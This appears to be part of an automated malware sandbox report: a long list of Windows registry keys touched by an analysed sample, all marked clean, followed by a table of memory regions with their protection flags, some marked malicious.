HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-21
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@zipfldr.dll,-10148
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-4
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\FXSRESM.dll,-120
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ScT\OpenWithProgids
scriptletfile
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3017
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3018
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{06290BD2-48AA-11D2-8432-006008C3FBFC} {00000112-0000-0000-C000-000000000046} 0x5
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\WFS.exe
clean
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
FontCachePath
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3692E
3692E
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3692E
3692E
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
clean
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum
Version
clean
There are 343 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5F5000
unkown
page read and write
malicious
5F8000
unkown
page read and write
malicious
23F3000
unkown
page read and write
malicious
603000
unkown
page read and write
malicious
5FC000
unkown
page read and write
malicious
400000
unkown
page execute and read and write
malicious
607000
unkown
page read and write
malicious
23A1000
unkown
page read and write
malicious
5F5000
unkown
page read and write
malicious
33A9000
unkown
page read and write
malicious
54F000
unkown
page execute and read and write
malicious
2FCB000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
7FF0002C000
unkown
page execute and read and write
clean
89D000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
3314000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
357000
heap default
page read and write
clean
1E6B000
heap private
page read and write
clean
373B000
unkown
page read and write
clean
1F20000
unkown image
page readonly
clean
1E50000
heap private
page execute and read and write
clean
317F000
unkown
page read and write
clean
21F0000
heap private
page read and write
clean
2B9A000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
21E000
heap default
page read and write
clean
7F0000
heap default
page read and write
clean
310000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2A76000
unkown
page read and write
clean
30DD000
unkown
page read and write
clean
7FF001E7000
unkown
page read and write
clean
233E000
unkown
page read and write
clean
1B00000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
E5000
unkown
page read and write | page guard
clean
13132000
unkown
page read and write
clean
7EFD0000
unkown image
page readonly
clean
1C750000
unkown
page read and write
clean
49F0000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
1C960000
unkown
page read and write
clean
2B60000
unkown image
page readonly
clean
205D000
unkown
page read and write
clean
202000
unkown image
page execute read
clean
60000
unkown image
page readonly
clean
1B7A8000
unkown
page read and write
clean
12F91000
unkown
page read and write
clean
62B000
unkown
page read and write
clean
37A6000
unkown
page read and write
clean
31B3000
unkown
page read and write
clean
3060000
unkown
page read and write
clean
4892000
heap private
page read and write
clean
7FF001B0000
unkown
page execute and read and write
clean
27C0000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
2E66000
unkown
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
31A000
unkown
page read and write
clean
1BA20000
unkown
page read and write
clean
12E85000
unkown
page read and write
clean
2B30000
heap private
page execute and read and write
clean
1BB000
unkown
page read and write
clean
2F8000
unkown
page read and write
clean
38CD000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
2FD1000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
36EF000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
7FF00180000
unkown
page read and write
clean
3C05000
unkown
page read and write
clean
470000
unkown
page read and write
clean
3BDF000
unkown
page read and write
clean
2AE000
heap default
page read and write
clean
2F77000
unkown
page read and write
clean
3221000
unkown
page read and write
clean
2E8E000
unkown
page read and write
clean
5DEE000
unkown
page read and write
clean
160000
unkown image
page read and write
clean
2D0000
unkown image
page readonly
clean
200000
unkown image
page readonly
clean
19A000
unkown
page execute and read and write
clean
27C0000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
2B90000
heap private
page read and write
clean
3BF8000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
29E6000
unkown
page read and write
clean
2A05000
unkown
page read and write
clean
22A000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
20000
unkown image
page read and write
clean
26A0000
unkown
page read and write
clean
327000
heap default
page read and write
clean
4C8000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
38A1000
unkown
page read and write
clean
2E4C000
unkown
page read and write
clean
38DA000
unkown
page read and write
clean
990000
unkown image
page readonly
clean
2E72000
unkown
page read and write
clean
1E0000
heap default
page read and write
clean
2F13000
unkown
page read and write
clean
1C10000
unkown image
page readonly
clean
30B0000
unkown
page read and write
clean
2FC1000
unkown
page read and write
clean
2EA8000
unkown
page read and write
clean
317000
heap default
page read and write
clean
3BD1000
unkown
page read and write
clean
395E000
unkown
page read and write
clean
3A6000
unkown
page read and write
clean
160000
unkown image
page read and write
clean
7FF00220000
unkown
page execute and read and write
clean
2EF1000
unkown
page read and write
clean
7FF001B0000
unkown
page execute and read and write
clean
4A0D000
unkown
page read and write
clean
7FF00020000
unkown
page read and write
clean
3EC000
unkown
page read and write
clean
7EFB2000
unkown image
page readonly
clean
7FF000D0000
unkown
page read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
8B0000
unkown image
page readonly
clean
3945000
unkown
page read and write
clean
2314000
heap private
page read and write
clean
27C0000
unkown
page read and write
clean
1B80000
unkown
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
352A000
unkown
page read and write
clean
2EE1000
unkown
page read and write
clean
3BF4000
unkown
page read and write
clean
2040000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
7FF001A0000
unkown
page read and write
clean
5730000
unkown
page read and write
clean
B0F000
unkown
page read and write
clean
30C9000
unkown
page read and write
clean
300000
unkown
page read and write
clean
7EFD0000
unkown image
page readonly
clean
1AEE0000
unkown
page read and write
clean
278F000
unkown
page read and write
clean
342000
heap default
page read and write
clean
5110000
heap private
page execute and read and write
clean
2150000
unkown
page read and write
clean
7FF000E0000
unkown
page read and write
clean
230000
heap private
page read and write
clean
7FF000EA000
unkown
page execute and read and write
clean
150000
unkown image
page readonly
clean
1C74E000
unkown
page read and write
clean
2229000
heap private
page read and write
clean
5A1E000
unkown
page read and write
clean
2940000
unkown
page read and write
clean
355C000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
32F9000
unkown
page read and write
clean
309000
heap default
page read and write
clean
3FF000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
30E1000
unkown
page read and write
clean
38D7000
unkown
page read and write
clean
314D000
unkown
page read and write
clean
2B50000
unkown
page read and write
clean
1B550000
unkown
page read and write
clean
29D8000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
80B000
heap default
page read and write
clean
7FFFFF10000
unkown
page execute and read and write
clean
A0000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
7EFD0000
unkown image
page readonly
clean
36EF000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
120000
unkown image
page readonly
clean
2EDF000
unkown
page read and write
clean
2B4A000
unkown
page read and write
clean
30B000
unkown
page read and write
clean
320F000
unkown
page read and write
clean
2280000
heap private
page read and write
clean
7FF001D0000
unkown
page execute and read and write
clean
180000
heap private
page read and write
clean
21D0000
unkown
page read and write
clean
77E000
unkown
page read and write
clean
12C21000
unkown
page read and write
clean
31C5000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
3087000
unkown image
page readonly
clean
3796000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
3319000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
320000
unkown
page read and write
clean
3559000
unkown
page read and write
clean
202000
unkown image
page execute read
clean
29FE000
unkown
page read and write
clean
320000
unkown
page read and write
clean
2FFE000
unkown
page read and write
clean
3549000
unkown
page read and write
clean
30C0000
unkown
page read and write
clean
2225000
heap private
page read and write
clean
7FF00020000
unkown
page read and write
clean
34D000
heap default
page read and write
clean
1C750000
unkown
page read and write
clean
36EF000
unkown
page read and write
clean
524E000
unkown
page read and write
clean
377D000
unkown
page read and write
clean
2B94000
unkown
page read and write
clean
12E70000
unkown
page read and write
clean
7FF00220000
unkown
page execute and read and write
clean
7FF00012000
unkown
page execute and read and write
clean
2130000
unkown
page read and write
clean
7FF00180000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
29E000
heap default
page read and write
clean
7FF00210000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
4874000
heap private
page read and write
clean
27C0000
unkown
page read and write
clean
2130000
unkown
page read and write
clean
36EF000
unkown
page read and write
clean
2130000
unkown image
page read and write
clean
E0000
unkown
page read and write
clean
3BEA000
unkown
page read and write
clean
1CE0000
heap private
page read and write
clean
21F4000
heap private
page read and write
clean
38A6000
unkown
page read and write
clean
2320000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
2350000
unkown
page read and write
clean
330000
heap default
page read and write
clean
3341000
unkown
page read and write
clean
1B47D000
unkown
page read and write
clean
2B94000
heap private
page read and write
clean
7EFC0000
unkown image
page readonly
clean
30CF000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7FF00210000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
190000
unkown
page read and write
clean
2140000
unkown
page read and write
clean
100000
heap private
page read and write
clean
2E6F000
unkown
page read and write
clean
7EFD0000
unkown image
page readonly
clean
1C960000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
1BB90000
heap private
page read and write
clean
7FF00190000
unkown
page execute and read and write
clean
2912000
unkown
page read and write
clean
33BB000
unkown
page read and write
clean
1B82E000
unkown
page read and write
clean
1D7B000
heap private
page read and write
clean
37B9000
unkown
page read and write
clean
322B000
unkown
page read and write
clean
2AFA000
heap private
page execute and read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
1C750000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
2284000
heap private
page read and write
clean
410000
unkown
page read and write
clean
33A1000
unkown
page read and write
clean
322E000
unkown
page read and write
clean
1BABE000
unkown
page read and write
clean
393C000
unkown
page read and write
clean
1B70000
unkown image
page readonly
clean
35C0000
unkown
page read and write
clean
2F0000
unkown image
page read and write
clean
200000
unkown image
page readonly
clean
7EFC0000
unkown image
page readonly
clean
2B44000
unkown
page read and write
clean
4B20000
heap private
page read and write
clean
3165000
unkown
page read and write
clean
A0000
unkown
page read and write
clean
1A2000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
274000
unkown image
page readonly
clean
2FB8000
unkown
page read and write
clean
428000
unkown
page read and write
clean
352D000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
12D91000
unkown
page read and write
clean
7FF000E0000
unkown
page read and write
clean
39A9000
unkown
page read and write
clean
35C6000
unkown
page read and write
clean
39D4000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
1AC80000
unkown
page read and write
clean
1E00000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
202000
unkown image
page execute read
clean
299E000
unkown
page read and write
clean
7FF000EA000
unkown
page execute and read and write
clean
2F4B000
unkown
page read and write
clean
7FF00012000
unkown
page execute and read and write
clean
7FF00160000
unkown
page execute and read and write
clean
373F000
unkown
page read and write
clean
340B000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
5F0000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
26A0000
unkown
page read and write
clean
2E6C000
unkown
page read and write
clean
1DF5000
heap private
page read and write
clean
5FB000
unkown
page read and write
clean
277000
heap default
page read and write
clean
274000
unkown image
page readonly
clean
2DF000
heap default
page read and write
clean
5340000
unkown image
page readonly
clean
1C750000
unkown
page read and write
clean
2220000
heap private
page read and write
clean
2170000
unkown
page read and write
clean
38F6000
unkown
page read and write
clean
1AB000
unkown
page execute and read and write
clean
253D000
unkown
page read and write
clean
1BA24000
unkown
page read and write
clean
260000
heap default
page read and write
clean
200000
unkown image
page readonly
clean
7FF001E0000
unkown
page read and write
clean
2EFB000
unkown
page read and write
clean
2FCE000
unkown
page read and write
clean
780000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
3530000
unkown
page read and write
clean
1D40000
heap private
page read and write
clean
7FF00150000
unkown
page read and write
clean
1E8000
heap default
page read and write
clean
2F60000
unkown
page read and write
clean
E6000
unkown
page read and write
clean
36EF000
unkown
page read and write
clean
3A7F000
unkown
page read and write
clean
A30000
unkown image
page readonly
clean
D0000
heap default
page read and write
clean
2F9000
heap default
page read and write
clean
6BF000
unkown
page read and write
clean
1CB4000
heap private
page read and write
clean
202000
unkown image
page execute read
clean
1C8AE000
unkown
page read and write
clean
31DB000
unkown
page read and write
clean
5B0000
heap default
page read and write
clean
26A0000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
470000
unkown
page read and write
clean
2140000
unkown
page read and write
clean
3533000
unkown
page read and write
clean
2150000
unkown
page read and write
clean
30CC000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
1AD000
unkown
page read and write
clean
351E000
unkown
page read and write
clean
7A0000
unkown
page read and write
clean
1A7000
unkown
page execute and read and write
clean
1E0000
heap private
page read and write
clean
1B80F000
unkown
page read and write
clean
2BE0000
heap private
page execute and read and write
clean
2E50000
unkown
page read and write
clean
7EFB2000
unkown image
page readonly
clean
5B7000
heap default
page read and write
clean
351A000
unkown
page read and write
clean
5FB000
unkown
page read and write
clean
1B770000
unkown
page read and write
clean
274000
unkown image
page readonly
clean
1B81E000
unkown
page read and write
clean
38EC000
unkown
page read and write
clean
1B36000
unkown
page read and write
clean
3998000
unkown
page read and write
clean
3221000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
50000
unkown image
page readonly
clean
48B0000
unkown image
page readonly
clean
2980000
unkown image
page readonly
clean
5E0000
unkown image
page readonly
clean
2700000
unkown image
page readonly
clean
287000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
10000
unkown image
page read and write
clean
35CF000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
2EF5000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
2C1E000
unkown
page read and write | page guard
clean
1BAE0000
unkown
page read and write
clean
2AE0000
unkown image
page readonly
clean
396000
unkown
page read and write
clean
39C3000
unkown
page read and write
clean
3777000
unkown
page read and write
clean
212F000
unkown
page read and write
clean
2B5A000
unkown
page read and write
clean
230000
heap private
page read and write
clean
310000
heap default
page read and write
clean
5BFF000
unkown
page read and write
clean
20000
unkown
page read and write
clean
2F35000
unkown
page read and write
clean
378D000
unkown
page read and write
clean
1BB6000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
7EFC2000
unkown image
page readonly
clean
308000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
3923000
unkown
page read and write
clean
2920000
unkown
page read and write
